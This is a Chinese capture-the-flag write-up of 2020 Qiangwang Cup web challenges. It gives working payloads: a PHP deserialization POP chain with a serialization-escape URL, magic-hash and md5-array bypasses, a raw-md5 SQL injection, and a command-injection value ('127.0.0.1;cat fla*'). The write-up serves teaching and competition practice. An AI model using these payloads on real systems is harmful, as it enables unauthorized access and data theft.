2020强网杯 强网先锋web writeup

彩笔跟着队里师傅复现

强网先锋

web辅助

反序列化逃逸,先构造pop链

<?php
class player {
    protected $user;
    protected $pass;
    protected $admin;

    /**
     * Account record used by the challenge. Its serialized form is determined
     * entirely by these three protected fields; because they are protected,
     * each serialized key carries the "\0*\0" prefix that the writeup's
     * password payload reproduces.
     *
     * @param mixed $user
     * @param mixed $pass
     * @param mixed $admin privilege flag, 0 unless a caller supplies one
     */
    public function __construct($user, $pass, $admin = 0) {
        $fields = ['user' => $user, 'pass' => $pass, 'admin' => $admin];
        foreach ($fields as $field => $value) {
            $this->$field = $value;
        }
    }

    /** Returns the privilege flag as stored, without any cast. */
    public function get_admin() {
        return $this->admin;
    }
}

class topsolo {
    protected $name;

    /** @param mixed $name defaults to the string 'Riven'; the chain stores an object here */
    public function __construct($name = 'Riven') {
        $this->name = $name;
    }

    /**
     * Calls $this->name when it holds an object (a Closure or anything with
     * __invoke). gettype() never returns "function" — a Closure reports
     * "object" — so the original "function" branch was unreachable and is
     * omitted here; a string or scalar $name does nothing.
     */
    public function TP() {
        if (gettype($this->name) !== "object") {
            return;
        }
        $target = $this->name;
        $target();
    }

    /**
     * Runs TP() the moment unserialize() restores the object, i.e. before any
     * application code inspects it. A magic method that calls an
     * attacker-controllable member is exactly what makes unserialize() on
     * untrusted input dangerous.
     */
    public function __wakeup() {
        $this->TP();
    }
}

class midsolo {
    protected $name;

    /** @param mixed $name the chain stores a jungle object here */
    public function __construct($name) {
        $this->name = $name;
    }

    /**
     * Resets $name to 'Yasuo' on unserialize() unless it already is.
     * NOTE(review): on a straightforward unserialize() this runs before
     * __invoke and would discard the object stored in $name; the final payload
     * in this writeup is not the verbatim serialize() output (its declared
     * property count does not match its body), presumably so this hook is
     * skipped on the challenge's PHP version — confirm against that version.
     */
    public function __wakeup() {
        if ($this->name === 'Yasuo') {
            return;
        }
        $this->name = 'Yasuo';
        echo "No Yasuo! No Soul!\n";
    }

    /** Makes the object callable, which is what topsolo::TP() needs. */
    public function __invoke() {
        $this->Gank();
    }

    /**
     * stristr() coerces its haystack to string: when $name is an object with
     * __toString, that method runs here (the hop to jungle in the chain).
     */
    public function Gank() {
        $found = stristr($this->name, 'Yasuo');
        echo $found ? "Are you orphan?\n" : "Must Be Yasuo!\n";
    }
}
class jungle {
    protected $name = '';

    /** @param mixed $name unused by the methods below; defaults to null */
    public function __construct($name = null) {
        $this->name = $name;
    }

    /**
     * Any string coercion of a jungle (stristr() in midsolo::Gank() is the one
     * used by this chain) lands here and triggers KS() before yielding "".
     */
    public function __toString() {
        $this->KS();
        return "";
    }

    /** Sink of the chain: emits phpinfo() output. */
    public function KS() {
        phpinfo();
    }
}
// Assemble the chain from the sink outward: jungle (phpinfo sink) sits inside
// midsolo (callable via __invoke), which sits inside topsolo (calls it from
// __wakeup). The printed string is the gadget chain, presumably the $pop used
// in the password payload below.
$jungle  = new jungle();
$midsolo = new midsolo($jungle);
$topsolo = new topsolo($midsolo);
print serialize($topsolo);

然后进行反序列化逃逸

%title插图%num

110长度的user数据被当作字符串,后面的数据完成逃逸

%title插图%num

// Escape payload for the challenge's serialized player record. The user field is
// filled with repeated "\0*\0" (single-quoted, so these are the literal
// characters backslash, 0, *, backslash, 0 — not NUL bytes); per the note above
// the server treats 110 bytes of user data as the string, presumably because it
// rewrites these sequences after computing the length, so what follows is parsed
// as further serialized fields rather than as part of the string.
$username='\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0';
// Closes the user string early, supplies pass and admin, then appends $pop —
// presumably the serialize($topsolo) output printed above; $pop is not defined
// in this listing. The server-side root cause is unserialize() over a string
// assembled from request data; the fix is not to do that (store ids, use json_*).
$password='";s:7:"%00*%00pass";s:0:"";s:8:"%00*%00admin";'.$pop;

传入payload:

?username=%27\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0%27&password=%22;s:7:%22%00*%00pass%22;s:0:%22%22;s:8:%22%00*%00admin%22;O:7:%22topsolo%22:2:{S:7:%22\00*\00\6e\61\6d\65%22;O:7:%22midsolo%22:1:{S:7:%22\00*\00\6e\61\6d\65%22;O:6:%22jungle%22:1:{S:7:%22\00*\00\6e\61\6d\65%22;N

%title插图%num

%title插图%num

Funhash

//level 1
// Loose comparison (!=): two numeric-looking strings are compared as numbers,
// so an input of the form "0e<digits>" whose md4 digest is also "0e<digits>"
// compares as 0 == 0 and passes. A strict compare (!== or hash_equals()) would
// close this; the bypass below relies on the loose operator staying in place.
if (hash("md4", $_GET["hash1"]) != $_GET["hash1"]) {
    die('level 1 failed');
}

level 1 的判断条件是 hash1 的原始值要(弱类型 `!=`)等于其 md4 哈希值,与 md5 的 0e 绕过类似,写个爆破脚本:

<?php
// Searches for a "magic" md4 string: a candidate "0e<digits>" whose md4 digest
// is also "0e<digits>", so PHP's loose == treats both as the float 0 and the
// level-1 check passes. Prints the first hit and exits. Candidates run from
// "0e2" to "0e1000000001", exactly the range the original while loop covered.
// The server-side fix is a strict comparison (!== / hash_equals()).
for ($i = 2; $i <= 1000000001; $i++)
{
    $n = "0e" . $i;
    if ($n == hash("md4", $n))
    {
        echo "hash:$n";
        exit();
    }
}
?>

%title插图%num

//level 2
// Requires hash2 !== hash3 but md5(hash2) === md5(hash3). With array inputs
// (hash2[]=1&hash3[]=2) the two arrays are not identical, while md5() given an
// array emits a warning and returns NULL on PHP 7 — and NULL === NULL, so the
// second check passes (PHP 8 throws TypeError instead). Defence: reject
// non-string input with is_string() before hashing.
if ($_GET['hash2'] === $_GET['hash3']) {
    die('level 2 failed');
}
if (md5($_GET['hash2']) !== md5($_GET['hash3'])) {
    die('level 2 failed');
}

判断条件: hash2 不能和 hash3 全等,但 hash2 的 md5 要和 hash3 的 md5 相同。
我们利用 php 中 md5() 接收数组时返回 NULL(PHP 7;PHP 8 会抛 TypeError)的特性来绕过:两个不同的数组不全等,而两者的 md5 结果都是 NULL,
传 hash2[]=1&hash3[]=2

//level 3
// md5($x, true) returns the 16 raw digest bytes, which are concatenated into the
// SQL literal unescaped; a digest containing a quote (the input in this writeup
// yields ...'or'8...) rewrites the WHERE clause. Mitigation: bind the digest as a
// parameter of a prepared statement, or hex-encode it, instead of building the
// query string. $mysqli is created outside this excerpt, and a failed query
// (false) is not checked before fetch_assoc().
$query = "SELECT * FROM flag WHERE password = '" . md5($_GET["hash4"],true) . "'";
$result = $mysqli->query($query);
$row = $result->fetch_assoc(); 
var_dump($row);
$result->free();
$mysqli->close();

level 3 的关键是 md5($_GET["hash4"],true) 返回的原始字节被直接拼进 SQL,需要让这些字节中出现 'or' 使条件为真:

content: 129581926211651571912466741651878684928
hex: 06da5430449f8f6f23dfc1276f722738
raw: \x06\xdaT0D\x9f\x8fo#\xdf\xc1'or'8
string: T0Do#'or'8

最后构造payload:

?hash1=0e251288019&hash2[]=1&hash3[]=2&hash4=129581926211651571912466741651878684928

%title插图%num

主动

127.0.0.1;cat fla*